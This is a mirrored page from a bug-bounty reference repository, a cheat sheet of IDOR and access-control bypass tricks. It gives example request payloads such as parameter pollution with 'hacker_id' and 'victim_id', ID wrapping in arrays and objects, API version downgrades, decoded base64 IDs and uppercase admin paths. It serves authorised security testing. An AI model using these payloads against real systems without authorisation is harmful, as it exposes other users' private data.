mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 10:26:11 +00:00
1.5 KiB
1.5 KiB
IDOR (Insecure Direct Object Reference)
- Add parameters onto the endpoints for example, if there was
GET /api/v1/getuser
[...]
Try this to bypass
GET /api/v1/getuser?id=1234
[...]
- HTTP Parameter pollution
POST /api/get_profile
[...]
user_id=hacker_id&user_id=victim_id
- Add .json to the endpoint
GET /v2/GetData/1234
[...]
Try this to bypass
GET /v2/GetData/1234.json
[...]
- Test on outdated API Versions
POST /v2/GetData
[...]
id=123
Try this to bypass
POST /v1/GetData
[...]
id=123
- Wrap the ID with an array.
POST /api/get_profile
[...]
{"user_id":111}
Try this to bypass
POST /api/get_profile
[...]
{"id":[111]}
- Wrap the ID with a JSON object
POST /api/get_profile
[...]
{"user_id":111}
Try this to bypass
POST /api/get_profile
[...]
{"user_id":{"user_id":111}}
- JSON Parameter Pollution
POST /api/get_profile
[...]
{"user_id":"hacker_id","user_id":"victim_id"}
- Try decode the ID, if the ID encoded using md5,base64,etc
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
dmljdGltQG1haWwuY29t => victim@mail.com
- If the website using graphql, try to find IDOR using graphql!
GET /graphql
[...]
GET /graphql.php?query=
[...]
- MFLAC (Missing Function Level Access Control)
GET /admin/profile
Try this to bypass
GET /ADMIN/profile
Source: @swaysThinking and other medium writeup!